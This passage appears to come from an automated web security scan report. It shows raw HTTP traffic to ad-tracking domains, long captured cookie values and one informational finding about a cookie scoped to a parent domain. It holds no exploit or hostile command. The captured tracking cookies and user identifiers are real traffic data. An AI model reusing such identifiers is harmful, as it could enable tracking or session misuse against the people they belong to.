NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS8NW9oZDZFaEP3/Yfrnhu4IU3vheM/Ns0vAjloMpK625XiMz/7xhK4LyZJaQSIcY62RPvVLOf3Rqv8g6s+S0M37pSe4EUYkkllytqzoreA1HphdoGataiGY4MsnrRzbfN6fbGCdJ172IioJGG1zG79GGw30oDC4C7VmxYrej3tFQObZgU/tZkjzZn3Hdaqh0eSrDXnAp9zEz+/boOL3WcogTsj3/5fveweY9zxSv/NNwjuCrs5KZBGPT52bhf9l1YcBc1sBVfIM0OwL3Q45hRQoNrZ+sSycfMhs3uZuHsbYIbscOzTaWr8wcP588YnH8VwzJkxibne7pWZ+tDF3WLkweCsOEB2wduQ/Nt+cxKZtZnWKHe6ubb1RHQU/4XJhond4VmDT+2+NQRAcIqO6b7DwRmCs6bBKfFEsME2KDEO7yQvuJyHviRatdQMpprGvH8Wo5s4ekgfmi9/UxSZ3IIYryMySkUDTqkcuv2l2EsbCBlgSv+kEo3KEj2gb4P8DVwOHPUvbXXxaY2U9CXG8qiIj8oYq2earIwKHoufO8sYTyJ9sisD/FTESrdnc4kYVPvw/iARgA4NrcDBkZaQk=; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; rtc_eC0O=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; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; rsiPus_TcLI="MLsXtaMOZwhnJpGoWeqiOkhRBfJq5qBSuRPKlWnBpfgZQSo6yJttbu+GJyr/FnqFiBtOj0MMf0A1OS6DgqF3FRtvufvgyQjAvbavIAzG/mrl5fos0jzFySM3Fy31Ao7Ebh3uztX78jATDhVNx1WRMLmFpna/hMyk0AkQ+RGNw8/ja9DZvVCIoWOZ3zoWVkQWa3moHLdcLNNI+7fIXit9fQONqT14U1w0FPBb9cgsoqgd68j6eMttu34aVZu/d+fUj7isKrKe4cndCaLYExmogONnWhKh+J9f7TLfa6PH0tptHMuZOF1cSr7P5cqBLbvFUcWsfjeMCG/f8spHnxQXAL8nRRC1wzaJ8qPaqDjVHhxu4nIepmoRGgrkOH8O0vQt4286anvsGhDbVv0Nsb7OVX9U0Zc4Vf4dZQ5G2e5hrZb1bJHQdQqjasWp1Nt8jnucTB8b4Q/Jnb3Fh7j+L7FGpNU/zU1yNFDSuSB54znzG47c6DP+6kDji+6RZbnzpWRyVAOCeS9Yc/ZzuNxpSay+Bdpn0kqwIBqeBXERDx1Z7KLNfWn7HtNHpyWaP3I4DNsn8PrZK8b2Gjc0e14CZ245dGCAuQdwJbc6j2SUur9nDYW7cL6tvB5y1MH0cPCty0J2lEFcYTKXCPFsSIp3YAkS32MvvsdoLn1d/krkLg4zda0cMm9Kua59JbmSoXHIJItgIVnEP3SkX7dxYOd/DG7OAoG0I5wUUn+AJ4LRa5kU32nRHVwQaDILCW1VzY0B3lSS6Z9mSpIBHUhRv5gciu6tTOzoiB2kH3XA72pKyLVROk9D4KLucgAAB+ueIRn8wR69h5gPZ+lHiKjpmubSMQ3yV8dSjX1dVUDfUUrBDh8OjRz7WzfanDaDqoUrFKI6EHw1XnTDWLM2cnSFkfFaQgOC8YrZowqyhJMuuVpIx/ixqnDsx9kGIztW8Hi1FuloHNVNBQHIU4G6iJqwoVu6bNOwfNRqNvD/w4oqWtvXqCvuIikhh9wMSzTE0UZqd6ZfWwpbTH1MOPdJdcxX31rZx4qSHBpMhxoyszkjZj9YPfgAMrb86c7kpVdrUj4LxTZs6Z5o82umuiNWChLZ/DvN29RfpYYmRQ073p9Hc48NlMflrzKueAGPB93K3+o1eEBylETNrLYuNFB68oIWntcNDAZLIg2HcsY3N4iXyk2yPWxW6r+YoZUTnq+vo9ElytuK/Jp8W7p4jtG47jpY8kQXsYtu9C3HHcoqi2SdLX2w/VUwBs/3SU3CI25hLq/LU0izRT66MSrwujtCk2q6sM4M"; rsi_us_1000000="pUMlIymnMBYY1A2AKVt/X42sJFnhBIsVXupLmVgPalQSXetQt1elVlvt4Kw5pRsR+P7ZtkH37C+PV21OTgK2tSplzTgX1CmAikLsMGDiVOeyz9gzHAnSm372yh4tVHRxb8PeHhUHejBiiZxOkhaZ045oThXnSR8DAX6fYV/ybIiqulf+Pu3RMyR5oF+yDfrCk40UNg0Mp16XYh7mRSVM/HoY4oDuWAom4gnqrhPe3r+iQUB0j3q0tkwKlBzk/9MGM3R2hf6QFQcFA/Y0lx/KIqYkEDuXlq7lweOLDGfB2KHCGVGkzKMsPN9GFXv/RUyGxIOOHISzxTE3RILsCvsP9soypT8NSUHCAcVVr5WpVuc2vUOi5MgBmGqRNBKolDzTy9/FBYJrmOzpeSO58TchDb61tROKccLOkHuqT1Q1cveswkoS3BkggmAJjNfOnag0xP3yotFAiIv7586EVSdiV8c84zW0RkP0Ltu6foHuhK1+R29GukGI/oWg2BobCpX/IAzdzVQKwKcBRQ4Dgwjtb8LRAPdEqwOSyrmF3oGNQaA0L+897x8nXL3Plyo1+OjxoEKVJ2EzmHkURDIYKyDLfZRA28hnB+UGj8LF9DhdnAYoQ6V2zOBqn6vO+BaB9czT3Pyzhw2zAuBWx+Jz5M1ht4XwlNIFhQpBD9DiYjy8+M6kL8fYMJ5ChzfLzauc4bc2f10QzIGJ/TOEQiJNgm/UYCPJimT8yavPrnQz1SwuiFKZxBHp4f29XKyXF0iX7bCrt6AOTgiss8wuNC3a/3aM/IgHRcWu3038LNW/sm7n7Gd0W4h5H72gd766m8rkC/YH8RRqsnZyX5R5wcPZLFUAJqEAOeZZjinbq/rgpxkp/x2CQ+hkPVNW2EjnMU77XaSR8pvN/HxrRF+AnH5BJ8USrrubV2etFGYmz1q0uLrxDphjCAN+lUd4NH5My9BwokFQvEeslMNVT42zlFkwpCZNLBWaUW9ajxJHkf7O1TOfSkcjuaQbwzei/zcbbxVZEzsH5nUPYbmnVGb97Da4oyNNuelVVMt7+XASLKnLONiHv3IGdI0yDuFGyHvA+QZ3g3pUbwU3ChTe2w4iMgYE0rwZZf5LpNds2gECG3zZAfbjF3KG1FCIoCjdAzYh5g5ZbWQ2jN011jYnH4ecXHdn3ceT0SJQNyxMoAA71+f1pYIn+9aH4Bk3tHrq9laUX4l9wgNgjSti9ZxOhSzb7g2fHqqygqPvS+aX0Pm0oEGQldpEekjZsQfiKBNyX/DneA7f/CypSSCNtaDDsonnfNSpBklcNi4bY/t0n2Z5WK0HCdRBJuqZJ8Nrg1tm82nxWLHf/M8k/d0VjYDc/FvxEWvtX3ZM+/++gC+QdS4Uz7JQ0KQ/Jpdh1/+8IfDEnme0rmuBVl25YTq1S32n1Z5cXUfq+9KOylWqlBE0S6zQkXZQBgIxgYl3ZoFdvE6/jtVyuh5jdSAjrzg4JebjZ774LSV6xP+redbMdzWAjZALUH23JsqOMGz8Hq/WqWP/X2IvHbrcv2IvRQyCPVRlh20+ZlqrihQ3tB/Zbzm9mE7B8DV3UXi/T4wHXgbFaAJzX5UKgpBX2CW7TkqyPtmhtZQOnfGFBneT+Vy/8uhXjkWSTt1QSpmXhydn5vcDkVl88gffwl8Ztr8ZGAiHJGpCuraCuZwkZGZ07gO81Q+Sht1LHglUiz5IlGk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLmEmwLgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Cin3im/BWv6yFReAkWBsEPdpYNcWyvDqqrnxlZZDKHJC4T+B4HODv/HJ1MLMTKLDPZ0QU3pMIyAxsUIWT8mICGsLOcWmdhqaEBzvYPOSJj9WnbTNOFR7erYJlTe5vqg+nh7RGPSoFfWPOKKA7eIQc0s3cZlY/cXec9PTKBB3c9EYPqrXEQq2Q0xXPhSvvm0z3G3fT464on9jTU71pl5AYGUbs4WM4OQkRXWS+0a/nigHuUv1xHdo2a6bSKSKIb/0GyOZosEwZGpyl6bHp1kzYthmcSdk8hKB0K5O+mZK0aPMFj2roV9o9cqR0AOQ2tocmyoUJ7tyDwddA+5QR/KozVe66ER8T/jt1d6+8MX6nNkHtR7+GesgMMXOsP+b9VIgBA87ZrYflyi2FVT99x9GYMttPMy+zevVH2acul11RVwPQBtE7owiVQ3MF3r1cv2OiOyE=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ATjy=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3tvXN5qKIC+r63dQ4yV9iELcnt71VAcNP2TS4VlY4qSUGIMEVAYaUgmC7NU5revyXGNDe6v94gej2Ll1GWFFI2dH8k8lH1Ff21rKYxBzEbfkIA6N1ceTv+CvvfjLsErHWoX5Gbjv2eZyB4ELvHcydkAB+4bsC1I8le8u0u2Nd62YKRy8fcbsfFXXvRnUvaThTv3rzkv5CspRh2AzR6Aq9AyCgdVUZt774IR6jHsRIBaMVZ2/xLS2qb7AHJHICWQ/NvbFV5Egx+drUzogzecJzP1F9a7I72Rys3wYTJFG4RinOPTkqIgWX5YFQgf/NKLe8L9amhNQwFzPB81z8oqo73xqWnOsn/fJsgbUsHNKqwLLR9J8JdJ7OKKrHbFOHKcHjwneMvgXl68SpRzvSN0JVpH4Hf38scui+KQPdP+44AiYo0EvENPZHNPtPF+bsZqXUpOymEDNNWA4SyB3qM4zx9AmmT3tdIVl28Dwy8W+Jx7pdO0qUFnOCnhJsABSm88OzwmOSOPO1QlKU6WCV+6lMNW5ej+BEAeTt4/CxR5RfLbEIJXMNeszvYnggs/CpF6rtt+XdK84ARx9U7ptksbISkviNi5gh+Q5kuui32Mq11E0BU1Omq20x7z02L88yBbkTNLnd9QGDFmUpXQwHHPPVCwcONPHOixRrf8NdCD6eo6Iln9PJEhpkm5dP+ncCFO/8C5nzpmHmIQwXUoYgEQpDKK2DqFIM5I0LPFuzwam8tGmCsqpj3nSMUSemS4ddro4IHbouqYkBZKb3PvFcweuPHX2kdvMJc67YNbP8FoISMdqftdea7X4LkuqSrXLpkGZRyor+87U90qdc9TPuDQ2aMyMMrz4e41O2ox0W1POv493D35oj/Q9OfwwO/G5RQpWrl7cqLP+BasJf8NXYcXHahoNm0WzkkJzPTGroDv4e/GgHuLnlJG5RxtWe70Vn6qHa2OCQswMVPfVkZYTCy6VlfcXZ7oo7/d7NEJFnR7rswMA8QgZUj4x7FV1HKIFvF/fguK/WyjOyMPh8hKEMqG67zMHplbxUSMxgYT1myVPFa53tz2mZYu23+IrOg/UHvaMCXUsRZhh6FWVrSbbvRY8j93s/aqTJkrLl+pjtt/OvKVtVmBpN3++gFjVXp4q0LmGbHTipP2vL/GjDRPiZ9yx49irzr2r0onHsl1Vjr/Cwkuk08ERklhyhwMHLxkJ6YQXGpes1+sMBwXp8CGGGdM2+0HzAka7dzGwrNBbBs6J01OG9x/tDIPZljHDG5gsF+COVZbJf053d89jdm154jmkvlNpWdZSIHdFFtOHvRgA1/PKM8aLL1HmFEuQwCvlv9MG89tdgRa2UuyxZSMa1cESib+FfYMS2kuJaXtUHegaBknXyA7vaG45OpdEeqF3jXrfWHHT8AxqowUMDaiPf4aGn2Q6LDAANMyC6Sne+nBs7ov91EPV8J58LciHAS7kVJuDKDnLsaAPFHJ648njM/zqsa4QGM8fGHnMO6qxFa1n5bvWAMaIYhHpE6uYW/PM8O4xn3d2q6/8X0aG5+ltW70guqCRrp0YlT1I7cns/cpycCZ+JXxVHlpQRG0WEHmrNIs4SIjneCtxFv1zPKrC5XjhYvrEoETpGXAlXNUVSzJzF29KqRnFwzhNK4vvDwHPPEkpJ5z5kbXqD/iKFodzrHoLyV0xo3gsNgoG21UzMmA/dKjA81DNpwgOWLcCArKhUu+pAkSh1FwNKcWITb+Dy1swWctPgSJNis01jl/5Zvo7; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:59 GMT
Content-Length: 729

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs=['I09839_10001','I09839_10075'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...

12.113. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dp_rec="{\"1\": 1305981628+ \"3\": 1307964066+ \"2\": 1307963584+ \"4\": 1305981633}"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=41 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwCY4pMAAAAAAAn6JAAAAAAAAgAEAAYAAAAAAP8AAAACB4FnFAAAAAAA2NAfAAAAAABDfDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAu0kMAitH8z9mZmZmZmYHQOxRuB6FawVAAAAAAAAAGkDrUbgehWsFQAAAAAAAABpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBBGnvP9U-ClMwuEQyoHc3HZ8S59kPTfcOFYAWAAAAAA==,,http%3A%2F%2Fthesouthern.com%2F,Z%3D728x90%26_salt%3D194510286%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,1b27218a-95ae-11e0-b487-bfeed3f845e0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1305508826+ \"4\": 1305981633}"; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICIxMTMiOiBbIkZRV1dDMlZLMkRXRiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDI3Ml19; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; 